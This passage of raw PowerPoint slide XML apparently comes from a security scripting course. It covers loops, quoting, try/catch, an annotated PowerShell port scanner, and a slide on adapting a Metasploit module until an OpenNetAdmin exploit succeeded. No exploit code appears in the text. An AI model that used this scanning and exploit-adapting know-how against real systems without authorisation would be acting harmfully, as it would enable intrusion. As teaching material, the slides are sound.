                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FB1DC4-124D-49FD-8D6D-50B13B219D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836416" y="4756118"/>
            <a:ext cx="220565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while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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D0C76A-2CEB-42E5-8B1F-2211227BF64F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7252659" y="5326712"/>
            <a:ext cx="368675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for var in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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA348D14-70FC-409E-9E8D-8C640B4742D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6855405" y="3551900"/>
            <a:ext cx="4003308" cy="1809613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3835330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C29C87-062F-4720-ADF6-F360197FC9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BA9F60C-524B-4412-BA47-D4F5400F8AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Bonus Loop Info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0316D2F-9E65-4D57-A5AF-E58E2F76990E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322261" y="1325698"/>
            <a:ext cx="7361558" cy="2103302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06173033-D12B-4130-87E6-2DD3752BD173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064081" y="3709853"/>
            <a:ext cx="5877918" cy="2336096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDE0356-174E-4F00-B054-0083387221F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7834116" y="1314297"/>
            <a:ext cx="4225804" cy="5040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enumerate</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Found in Python</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Can get an index </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and</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object simultaneously</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endParaRP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continue</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Not present in PowerShell</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Skips to the next iteration</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endParaRP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break</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Ends the loop (any loop)</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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB13990-24AD-4795-BF3F-083B8ABF9EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846260" y="1325698"/>
            <a:ext cx="1029019" cy="2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6C78FAF0-3D24-46CD-8F63-F63E66E7F295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484151" y="1706755"/>
            <a:ext cx="916150" cy="2587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BCA03194-22BE-4840-ADEF-E5B8E2E16A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369851" y="2655916"/>
            <a:ext cx="781529" cy="2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704127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32121-4281-4D9C-9694-027530E358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CF31FE-4D92-4C81-B9CB-7AAA13976CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Final Note: Quotation Marks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D97FEB91-8D7A-4CC2-B782-1CCFF5C387D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="2748280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Generally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single quote (‘) is taken as a literal string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Double quote (“) can allow for variable expansion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure you use the correct form or use escapes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\ is most common, PowerShell uses ` (backtick)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29212D86-990C-40F2-899B-0412CA7472DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310454" y="3726978"/>
            <a:ext cx="9286612" cy="2282662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12464599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E1691E-841D-479A-9BE9-1F702DAF49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A345AA2-4FD8-43D1-BAAC-35F80ABCF5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Open Net Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE1BD99-8CF7-4FA4-B728-24740230FFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11503342" cy="1620520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> found a Metasploit module, but it didn’t work off the shelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + Google showed a slightly different POST in other exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updated the Ruby to match the shell script and it succeeded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE6210B-31BE-4D8B-9158-D442B93C4F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="2915920"/>
            <a:ext cx="10135478" cy="2301439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7829AA46-C516-4BDE-AE27-DEBA1E0F60FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033750" y="4648121"/>
            <a:ext cx="9121930" cy="914479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B0BE1A-26A7-4A48-899E-0DE5B03695ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221510" y="3091304"/>
            <a:ext cx="2874490" cy="2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C609C93D-36EB-4F9F-BB95-1E0772369DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157470" y="5110563"/>
            <a:ext cx="3763010" cy="2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760142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9356-8246-4338-A5C5-FE6E130B51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62A538-86C4-475D-930B-7D32B71FEEFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Note On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenNetAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Shell Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B44B9C72-6D7E-4A49-8FE2-1D05455F61E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This loop will run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>forever, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>only exit is CTRL+C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is OK for applications like this because it’s pausing for input, but strongly consider using ‘true’ in a while loop before doing it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA8D9C9-1F48-48DA-9E20-975D1D555468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1869252" y="3108738"/>
            <a:ext cx="8453496" cy="1722120"/>
            <a:chOff x="1869252" y="2748280"/>
            <a:chExt cx="8453496" cy="1722120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501361A9-4082-4AC9-9723-5034B26B67C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="50789"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869252" y="2748280"/>
              <a:ext cx="8453496" cy="1722120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F6D481-E5DE-44B2-9ABF-8A3A631366BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1946910" y="3108738"/>
              <a:ext cx="1791970" cy="320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5424419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F66A36-5B67-46F3-A894-FD344E608C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43D518C-A1C5-467B-B99C-C623B31885A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell Port Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B73FEA0-DB6F-4F5E-BB74-6FA8887F9688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660775" y="2091108"/>
            <a:ext cx="8870449" cy="1988992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE50284-5751-4499-A749-AB2C83855F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="1352444"/>
            <a:ext cx="3775393"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Declare an array of ports to scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6E440B-216C-431C-8F96-3BEAD453F6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637251" y="4443727"/>
            <a:ext cx="32438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Use a foreach loop to hit every port in the array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27644099-A5D5-4381-85C5-97A9983C400C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7357902" y="1417509"/>
            <a:ext cx="40911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panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use a try/catch to handle errors, in this case, treat as closed if error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266D0266-7594-4D3A-85F3-1A82CA3B2956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6557327" y="4393342"/>
            <a:ext cx="45983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rial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use the foreach variable to initiate a connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5C2406-312E-4F8F-819C-D547218A1A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3289141" y="1721776"/>
            <a:ext cx="290196" cy="3693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9DFE95-1246-4329-9D40-F92279878A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2259186" y="2572361"/>
            <a:ext cx="202552" cy="18713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C9E0AA-30CC-428B-90F1-00CBB669F9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3088640" y="1947108"/>
            <a:ext cx="4291648" cy="784662"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF6D2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FB4365-8A8F-4CF0-B64A-22FFD96D9F44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3579336" y="1944188"/>
            <a:ext cx="3800952" cy="1371841"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF6D2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B402E5-35B2-4CD9-81DB-83B995DC0584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8856504" y="2999795"/>
            <a:ext cx="1232378" cy="1393547"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent5"/>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BAA40F-2C80-4D5D-8B78-09703D76C6B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4474064" y="5141778"/>
            <a:ext cx="324387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FFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Other Try/Catch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Python – </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="18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try: … except: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Bash – none</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28258108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2A5FB-4B88-43D8-9147-AA14D5CB2F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DD5B93D-E151-4900-A5D2-0E567CD5F898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Splitter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
